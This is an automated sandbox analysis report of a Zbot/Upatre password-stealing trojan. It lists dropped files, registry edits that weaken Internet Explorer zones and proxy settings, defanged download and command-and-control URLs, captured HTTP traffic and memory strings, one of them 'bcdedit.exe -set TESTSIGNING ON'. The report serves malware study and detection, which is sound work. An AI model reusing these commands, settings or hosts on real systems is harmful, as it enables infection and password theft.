Trojan-PSW.Win32.Zbot.4_c573865eae
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.389926 (B) (Emsisoft), Gen:Variant.Kazy.389926 (AdAware), Trojan-PSW.Win32.Zbot.4.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: c573865eaede3634864c7a1bfdc6a912
SHA1: a7398ebfb2f59a5b6252fe9ec78323bb78bbd2a9
SHA256: 32825d6e28c17e771764e5cff492f53331a744dbb5a1e3dceb9529306da237ad
SSDeep: 384:HATPUEREP2wIV2rMH9p50tvGmJA3ZgOBOOCQ9BkQuEFZ:gZEP/IVyMdp tvGmJA3ZgZnQfZZ
Size: 23014 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: hxxp://www.goforfiles.com/
Created at: 2005-08-25 00:55:16
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan-PSW. Trojan program intended for stealing users passwords.
Payload
No specific payload has been found.
Process activity
The Trojan-PSW creates the following process(es):
mlose.exe:1056
%original file name%.exe:1456
opera_autoupdater.exe:1200
The Trojan-PSW injects its code into the following process(es):
roguir.exe:1084
Explorer.EXE:1684
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process roguir.exe:1084 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%System%\drivers\13c40f.sys (745 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (6272 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (6580 bytes)
The process mlose.exe:1056 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Olyxeg\roguir.exe (4827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KMO1F7C.bat (173 bytes)
The process %original file name%.exe:1456 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\opera_autoupdater.exe (23 bytes)
The process opera_autoupdater.exe:1200 makes changes in the file system.
The Trojan-PSW creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\mlose.exe (3715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\0403UKc[1].elf (1799 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
Registry activity
The process roguir.exe:1084 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Wuokambiaq]
"4fgii8i" = " lBGJ45fYhcV JcKHGU=縞"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 12 73 65 F0 3F 70 B6 08 FC 93 6D 68 D2 D3 45"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process mlose.exe:1056 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 94 1B 13 25 A6 6A C8 D5 E7 95 4D 6F C2 FC 99"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:1456 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 3C 29 89 F5 A4 BE 1E 58 1C 4A 99 D6 7D 66 AD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"opera_autoupdater.exe" = "opera_autoupdater"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process opera_autoupdater.exe:1200 makes changes in the system registry.
The Trojan-PSW creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"mlose.exe" = "mlose"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "78 9B E0 9D DB 58 39 25 1A F0 31 62 AC D6 70 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-PSW modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-PSW modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-PSW modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-PSW deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| 1fe01bf0357e8f40244e87a521e319c7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\opera_autoupdater.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 1652 | 2048 | 3.52041 | 0d5b078af2e5ff8411b22f541d12ff63 |
| .rdata | 8192 | 896 | 1024 | 2.8164 | 38c698ff3738e5c4265e0cb20be36f70 |
| .data | 12288 | 2160 | 2560 | 4.63452 | 8f7d798669c92c8dfc1b5fb8ce8c149a |
| .rsrc | 16384 | 11504 | 11776 | 3.09398 | c14878b832c03d2374e1f989b3273ca4 |
| .reloc | 28672 | 164 | 512 | 0.832292 | a63a54b6b1497505033235ae487f5e57 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://thepristinehorizon.com/images/0403UKc.elf | |
| hxxp://maerholst.com/1/?s=0&v=170393861 | |
| hxxp://maerholst.com/1/?s=1&v=170393861 | |
| hxxp://maerholst.com/1/?s=2&v=170393861 | |
| hxxp://maerholst.com/1/?s=4&v=170393861 | |
| hxxp://maerholst.com/1/?s=3&v=170393861 | |
| hxxp://maerholst.com/1/?s=5&v=170393861 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Downloader (P2P Zeus dropper UA)
ET TROJAN Upatre Binary Download Jan 02 2014
Traffic
GET /1/?s=1&v=170393861 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: maerholst.com
Connection: Close
HTTP/1.1 403 Forbidden
Date: Fri, 20 Jun 2014 08:30:34 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /1/.on this server.</p>.<hr>.<address>
;Apache/2.2.22 (Debian) Server at maerholst.com Port 80</address>
;.</body></html>...
GET /1/?s=5&v=170393861 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: maerholst.com
Connection: Close
HTTP/1.1 403 Forbidden
Date: Fri, 20 Jun 2014 08:30:41 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /1/.on this server.</p>.<hr>.<address>
;Apache/2.2.22 (Debian) Server at maerholst.com Port 80</address>
;.</body></html>...
GET /1/?s=2&v=170393861 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: maerholst.com
Connection: Close
HTTP/1.1 403 Forbidden
Date: Fri, 20 Jun 2014 08:30:34 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /1/.on this server.</p>.<hr>.<address>
;Apache/2.2.22 (Debian) Server at maerholst.com Port 80</address>
;.</body></html>...
GET /images/0403UKc.elf HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: thepristinehorizon.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Jun 2014 08:30:31 GMT
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 04 Mar 2014 08:01:31 GMT
ETag: "440923-7e8ee-4f3c34fe95e48"
Accept-Ranges: bytes
Content-Length: 518382
Content-Type: text/plainZZP..MN/.fNa..N...~.?.N...cc..JZ...b..Qbz.N..;o.......&...n...)...NB..
...nb..n...n...n&..n..v*...Ch...b..v....,..M`.5.a...&..Le..J`...,[.A.
..Ne...J..Lm..I...I0..&c...2..Nb..Jb(.....]...Ob..Gb..Fb..>cB..R@.^
?.....w........NgB.Mb..D...Dc..Nb.w[...M`.."j..rc.FG....Br.N...M?..NL.
.6.@..|.r%...,`..Nb..`...:..^N.O2p...(...Ib...LC.N.Y.OZ...k68G...v....
`...^.....p.c..q"..qb..M]..N....d..N.<.Fb.-N[.J. ..vb..}...&...M..V
[email protected] ..w\.L.C.6..1K#...=..Z..}.b.}.r..V....Y..........e.
..Jva.K.8.A.B*.h.5A...N"C.OmE.Nc.......? .N?...B...`t6K....1?.;v?.^Q..
N?....M..c.......w...rK........r...1..a.N......u.j<.6... .K...."./&
lt;.N....".} .(..>a..?..N........j..R....q..Fb..H....h ..h..;...$c.
.^.....@.. .5Mn?.F..}....u..r.c...o..c[..MB.6OY..A.o.o.......I.Nb.a`.o
IM.q..b.Of....C.....`e.....I2(..Xb..Y...f...M......#l..o1..Z....1 .Mq.
..R......w?..G..~...vD[...c."..a...)._.....`....".j ......X..F. ..p.u.
...IQ..o...^B.r...{.v...N!..k..N"C2V..:nz..l .Mu...........?<Rk..U
kb<.3......z.......uh....D../D..;...;.(.wc...Y;....VH41UH..>.D..
[email protected]....'......}. ..DM.....Jb.2.)..O..}.......(.aK..[.v.......vC~ .-d
...x...s!.....K..{N.l..I...2..&.......^........'...Q?.........K...Mn..
LO!....tw....m.r...tw"A...@.....;z&..z.fm...w...wd..w......rL.Q. ..{R]
.}....d....b."........\t..[....q...........r........0......Nt.O[..sr..
[email protected]...'......:e...C.wZ' . bK.RY..H.B._HK.V.?6N...@1(..2.ggb........
..$b.../.7~K......OP.O.j..oyw.N1..^qp.Nep..SM...(8g..W.r..Db..:F.....6
.......6^.(.f..6F..us.a.Nc..K...FbA..n....1..wT`. ....._.f.......n<<< skipped >>>
GET /1/?s=0&v=170393861 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: maerholst.com
Connection: Close
HTTP/1.1 403 Forbidden
Date: Fri, 20 Jun 2014 08:30:35 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /1/.on this server.</p>.<hr>.<address>
;Apache/2.2.22 (Debian) Server at maerholst.com Port 80</address>
;.</body></html>...
GET /1/?s=4&v=170393861 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: maerholst.com
Connection: Close
HTTP/1.1 403 Forbidden
Date: Fri, 20 Jun 2014 08:30:35 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /1/.on this server.</p>.<hr>.<address>
;Apache/2.2.22 (Debian) Server at maerholst.com Port 80</address>
;.</body></html>...
GET /1/?s=0&v=170393861 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: maerholst.com
Connection: Close
HTTP/1.1 403 Forbidden
Date: Fri, 20 Jun 2014 08:30:34 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /1/.on this server.</p>.<hr>.<address>
;Apache/2.2.22 (Debian) Server at maerholst.com Port 80</address>
;.</body></html>...
GET /1/?s=1&v=170393861 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: maerholst.com
Connection: Close
HTTP/1.1 403 Forbidden
Date: Fri, 20 Jun 2014 08:30:35 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /1/.on this server.</p>.<hr>.<address>
;Apache/2.2.22 (Debian) Server at maerholst.com Port 80</address>
;.</body></html>...
GET /1/?s=3&v=170393861 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: maerholst.com
Connection: Close
HTTP/1.1 403 Forbidden
Date: Fri, 20 Jun 2014 08:30:41 GMT
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>403 Forbidden</title>.</head><
body>.<h1>Forbidden</h1>.<p>You don't have permis
sion to access /1/.on this server.</p>.<hr>.<address>
;Apache/2.2.22 (Debian) Server at maerholst.com Port 80</address>
;.</body></html>...
The Trojan-PSW connects to the servers at the folowing location(s):
kernel32.dll
roguir.exe_1084_rwx_00A40000_00006000:
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
roguir.exe_1084_rwx_010D0000_0006D000:
.text
`.data
.idata
@.reloc
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
0123456789
\*%Sa
RegDeleteKeyExW
gdiplus.dll
GdiplusShutdown
#ÛY_
5>(4 6 3
>5#? = 8
*:4.::,|
y.dRR
&*("?#=1http://maerholst.com/1/?s=%u&v=%u
REPORT
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
HTTP/1.1
http://www.google.com/
http://www.bing.com/
t.Ht$HHt
w%fkN
L$$
rnÊ
m9.td
McaG%n%c
zcÁ
MsgWaitForMultipleObjects
GetKeyboardState
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
UrlUnescapeA
PathIsURLW
SHLWAPI.dll
ShellExecuteW
Secur32.dll
ole32.dll
WS2_32.dll
